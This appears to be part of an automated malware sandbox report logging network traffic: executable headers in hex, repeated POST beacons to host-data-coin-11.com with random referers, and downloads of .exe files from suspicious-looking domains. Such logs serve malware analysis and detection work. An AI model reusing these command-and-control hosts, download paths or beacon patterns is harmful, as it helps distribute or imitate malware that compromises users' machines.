00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 20 02 00 00 04 00 00 00 e8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 0c 00 00 00 30 02 00 00 0e 00 00 00 ec 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:06 GMTContent-Type: application/x-msdos-programContent-Length: 440120Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "6b738-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:06 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a6 c8 bc 41 e2 a9 d2 12 e2 a9 d2 12 e2 a9 d2 12 56 35 3d 12 e0 a9 d2 12 eb d1 41 12 fa a9 d2 12 3b cb d3 13 e1 a9 d2 12 e2 a9 d3 12 22 a9 d2 12 3b cb d1 13 eb a9 d2 12 3b cb d6 13 ee a9 d2 12 3b cb d7 13 f4 a9 d2 12 3b cb da 13 95 a9 d2 12 3b cb d2 13 e3 a9 d2 12 3b cb 2d 12 e3 a9 d2 12 3b cb d0 13 e3 a9 d2 12 52 69 63 68 e2 a9 d2 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 16 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 04 06 00 00 82 00 00 00 00 00 00 50 b1 03 00 00 10 00 00 00 20 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 61 7a 07 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 f0 43 04 00 82 cf 01 00 f4 52 06 00 2c 01 00 00 00 80 06 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 78 06 00 38 3f 00 00 00 90 06 00 34 3a 00 00 f0 66 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 28 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 06 00 f0 02 00 00 98 40 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 03 06 00 00 10 00 00 00 04 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 28 00 00 00 20 06 00 00 18 00 00 00 08 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 36 14 00 00 00 50 06 00 00 16 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 70 06 00 00 02 00 00 00 36 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 03 00 00 00 80 06 00 00 04 00 00 00 38 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 3a 00 00 00 90 06 00 00 3c 00 00 00 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:08 GMTContent-Type: application/x-msdos-programContent-Length: 1246160Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "1303d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:08 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 83 34 8c 67 e2 5a df 67 e2 5a df 67 e2 5a df 6e 9a c9 df 73 e2 5a df be 80 5b de 65 e2 5a df f9 42 9d df 63 e2 5a df be 80 59 de 6a e2 5a df be 80 5f de 6d e2 5a df be 80 5e de 6c e2 5a df 45 82 5b de 6f e2 5a df ac 81 5b de 64 e2 5a df 67 e2 5b df 90 e2 5a df ac 81 5e de 6d e3 5a df ac 81 5a de 66 e2 5a df ac 81 a5 df 66 e2 5a df ac 81 58 de 66 e2 5a df 52 69 63 68 67 e2 5a df 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ad 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 0e 00 00 1e 04 00 00 00 00 00 77 f0 0e 00 00 10 00 00 00 00 0f 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 40 13 00 00 04 00 00 b7 bb 13 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 9d 11 00 88 a0 00 00 88 3d 12 00 54 01 00 00 00 b0 12 00 70 03 00 00 00 00 00 00 00 00 00 00 00 e6 12 00 d0 1d 00 00 00 c0 12 00 14 7d 00 00 70 97 11 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 97 11 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 f8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 81 e8 0e 00 00 10 00 00 00 ea 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 10 52 03 00 00 00 0f 00 00 54 03 00 00 ee 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 74 47 00 00 00 60 12 00 00 22 00 00 00 42 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 70 03 00 00 00 b0 12 00 00 04 00 00 00 64 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 7d 00 00 00 c0 12 00 00 7e 00 00 00 68 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:12 GMTContent-Type: application/x-msdos-programContent-Length: 144848Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "235d0-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:12 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 6c 24 1c e6 0d 4a 4f e6 0d 4a 4f e6 0d 4a 4f ef 75 d9 4f ea 0d 4a 4f 3f 6f 4b 4e e4 0d 4a 4f 3f 6f 49 4e e4 0d 4a 4f 3f 6f 4f 4e ec 0d 4a 4f 3f 6f 4e 4e ed 0d 4a 4f c4 6d 4b 4e e4 0d 4a 4f 2d 6e 4b 4e e5 0d 4a 4f e6 0d 4b 4f 7e 0d 4a 4f 2d 6e 4e 4e f2 0d 4a 4f 2d 6e 4a 4e e7 0d 4a 4f 2d 6e b5 4f e7 0d 4a 4f 2d 6e 48 4e e7 0d 4a 4f 52 69 63 68 e6 0d 4a 4f 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 bf 62 eb 5b 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 b6 01 00 00 62 00 00 00 00 00 00 97 bc 01 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 50 02 00 00 04 00 00 09 b1 02 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 03 02 00 a8 00 00 00 b8 03 02 00 c8 00 00 00 00 30 02 00 78 03 00 00 00 00 00 00 00 00 00 00 00 18 02 00 d0 1d 00 00 00 40 02 00 60 0e 00 00 d0 fe 01 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 ff 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 6c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 cb b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 0a 44 00 00 00 d0 01 00 00 46 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 07 00 00 00 20 02 00 00 04 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 03 00 00 00 30 02 00 00 04 00 00 00 04 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 60 0e 00 00 00 40 02 00 00 10 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 04 Jan 2022 18:34:13 GMTContent-Type: application/x-msdos-programContent-Length: 83784Connection: keep-aliveLast-Modified: Wed, 14 Nov 2018 15:53:50 GMTETag: "14748-57aa1f0b0df80"Expires: Wed, 05 Jan 2022 18:34:13 GMTCache-Control: max-age=86400X-Cache-Status: EXPIREDX-Cache-Status: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 04 Jan 2022 18:34:15 GMTContent-Type: application/octet-streamContent-Length: 6637149Last-Modified: Tue, 04 Jan 2022 16:37:59 GMTConnection: keep-aliveETag: "61d477e7-65465d"Expires: Tue, 11 Jan 2022 18:34:15 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b1 28 81 e9 d0 46 d2 e9 d0 46 d2 e9 d0 46 d2 2a df 19 d2 eb d0 46 d2 e9 d0 47 d2 76 d0 46 d2 2a df 1b d2 e6 d0 46 d2 bd f3 76 d2 e3 d0 46 d2 2e d6 40 d2 e8 d0 46 d2 52 69 63 68 e9 d0 46 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 3c ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 7c 02 00 00 04 00 00 a3 31 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 85 00 00 a0 00 00 00 00 90 03 00 50 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 71 60 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 52 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 f8 54 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 90 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 6b 00 00 00 90 03 00 00 6c 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: openrestyDate: Tue, 04 Jan 2022 18:34:18 GMTContent-Type: application/octet-streamContent-Length: 474112Last-Modified: Tue, 04 Jan 2022 16:40:43 GMTConnection: keep-aliveETag: "61d4788b-73c00"Expires: Tue, 11 Jan 2022 18:34:18 GMTCache-Control: max-age=604800Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 12 fd 7d 34 56 9c 13 67 56 9c 13 67 56 9c 13 67 e2 00 e2 67 44 9c 13 67 e2 00 e0 67 f4 9c 13 67 e2 00 e1 67 48 9c 13 67 5f e4 97 67 57 9c 13 67 c8 3c d4 67 54 9c 13 67 6d c2 10 66 4c 9c 13 67 6d c2 16 66 6c 9c 13 67 6d c2 17 66 74 9c 13 67 5f e4 80 67 43 9c 13 67 56 9c 12 67 7f 9d 13 67 c1 c2 1a 66 09 9c 13 67 c4 c2 ec 67 57 9c 13 67 c1 c2 11 66 57 9c 13 67 52 69 63 68 56 9c 13 67 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 73 1d 99 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 2c 05 00 00 0c 02 00 00 00 00 00 72 04 03 00 00 10 00 00 00 40 05 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 b0 07 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 98 06 00 dc 00 00 00 00 20 07 00 9c 4b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 07 00 34 39 00 00 20 7d 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 7d 06 00 18 00 00 00 58 7d 06 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 05 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 0c 2b 05 00 00 10 00 00 00 2c 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 70 01 00 00 40 05 00 00 72 01 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 ec 3e 00 00 00 c0 06 00 00 0e 00 00 00 a2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 09 00 00 00 00 00 07 00 00 02 00 00 00 b0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 30 02 00 00 00 10 07 00 00 04 00 00 00 b2 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 9c 4b 00 00 00 20 07 00 00 4c 00 00 00 b6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 34 39 00 00 00 70 07 00 00 3a 00 00 00 02 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mnxwgte.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 146Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fcsijwjo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytools-foryou-777.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxvce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nbivn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqtuiygbd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hyipaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ixfmgcxna.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hcnexlv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shqbxq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mrxnaw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kyrrypaj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
